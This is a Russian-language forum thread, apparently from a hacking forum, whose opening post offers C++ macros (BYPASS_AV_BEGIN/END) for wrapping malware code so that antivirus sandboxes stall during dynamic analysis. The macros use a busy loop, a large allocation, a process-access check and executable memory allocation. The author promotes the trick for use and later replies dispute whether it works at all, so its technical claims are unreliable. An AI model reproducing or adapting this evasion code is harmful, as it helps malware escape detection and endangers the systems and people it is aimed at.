#define BYPASS_AV_BEGIN char* memdmp = NULL;memdmp = (char*)malloc(100000000);if (memdmp != NULL){int cpt = 0;for (int i = 0; i < 100000000; i++){cpt++;}if (cpt == 100000000){HANDLE file;HANDLE proc;proc = OpenProcess(PROCESS_ALL_ACCESS, FALSE, 4);if (proc == NULL){LPVOID mem = NULL;mem = VirtualAllocExNuma(GetCurrentProcess(), NULL, 100, MEM_RESERVE | MEM_COMMIT, PAGE_EXECUTE_READWRITE, 0);if (mem != NULL){DWORD result = FlsAlloc(NULL);if (result != FLS_OUT_OF_INDEXES){ Code #define BYPASS_AV_BEGIN char* memdmp = NULL;memdmp = (char*)malloc(100000000);if (memdmp != NULL){int cpt = 0;for (int i = 0; i < 100000000; i++){cpt++;}if (cpt == 100000000){HANDLE file;HANDLE proc;proc = OpenProcess(PROCESS_ALL_ACCESS, FALSE, 4);if (proc == NULL){LPVOID mem = NULL;mem = VirtualAllocExNuma(GetCurrentProcess(), NULL, 100, MEM_RESERVE | MEM_COMMIT, PAGE_EXECUTE_READWRITE, 0);if (mem != NULL){DWORD result = FlsAlloc(NULL);if (result != FLS_OUT_OF_INDEXES){ #define BYPASS_AV_END }}}}} Code #define BYPASS_AV_END }}}}} Вставляем дефайны в заголовок исходника и используем! Пример: int main() { BYPASS_AV_BEGIN //malware code... BYPASS_AV_END } Code int main() { BYPASS_AV_BEGIN //malware code... BYPASS_AV_END } Прикол в том что динамическим анализом антивири умрут на моменте BYPASS_AV_BEGIN из-за for (int i = 0; i < 100000000; i++) и манипуляциями с выделением памяти в процессе. На деле задержек из-за цикла не будет ибо это простая инструкция для процессора и на оборот для санбокса антивиря.
1mNotS0rr1, проверь? я этот код проверял и сам использовал пока не ушёл с плюсов The post was merged to previous Dec 6, 2019 1mNotS0rr1, Я никому ничего не должен, я выкладываю свой код в котором уверен, и да, если бы ты знал хотябы основы C++, то понял что логика антивирусных санбоксов проста. А именно эти санбоксы трассируют все колы в программе но из-за того что это C++ а не шарп она может выборочно трассировать -- значит она с функции main пробегает по каждому колу пока не остановится на экзепшине и начинаем по новой пока не закончит. НО мой код представляет из себя капкан для трассировки и каждый раз она останавливается в этом месте. Ясен хуй что время у неё ограничено и ресурсы тоже так что до посинения она не будет трассировать это дерьмо чтобы выбраться из капкана.
Aendy, на самом деле все инфа по этому давно есть в паблике на ру сфере и рохитабе, я просто собрал всё воедино)
Опять это аниме пытается свои вирусы распостронить, будто нам вашего корона вируса мало кетайци праклятые.
Fender_inactive2697143, не нравится что-то в некст раз не высирай тут своё мнение а создай такую же тему.
0xEMPEROR, я не высрал, я дал вполне хорошие рекомендации. Разве ты не хочешь, чтобы твой код становился лучше?
Fender_inactive2697143, inline теперь для этого тоже не особо подходит, он больше делает weak linkage, а для констант лучше использовать constexpr кста)
Хмм, очень интересно, особенно если бы ТС объяснил какого лешего это вообще должно иметь шанс быть работоспособным, если int cpt = 0; for (int i = 0; i < 100000000; i++) { cpt++; } if (cpt == 100000000) { } C int cpt = 0; for (int i = 0; i < 100000000; i++) { cpt++; } if (cpt == 100000000) { } Вот эта часть кода вообще оптимизируется компилятором со всеми флагами А выделенная в начале память вообще утекает. memdmp = (char*)malloc(100000000); C memdmp = (char*)malloc(100000000); Почему нельзя оформить всё как нормальный человек и не лепить всё в define ?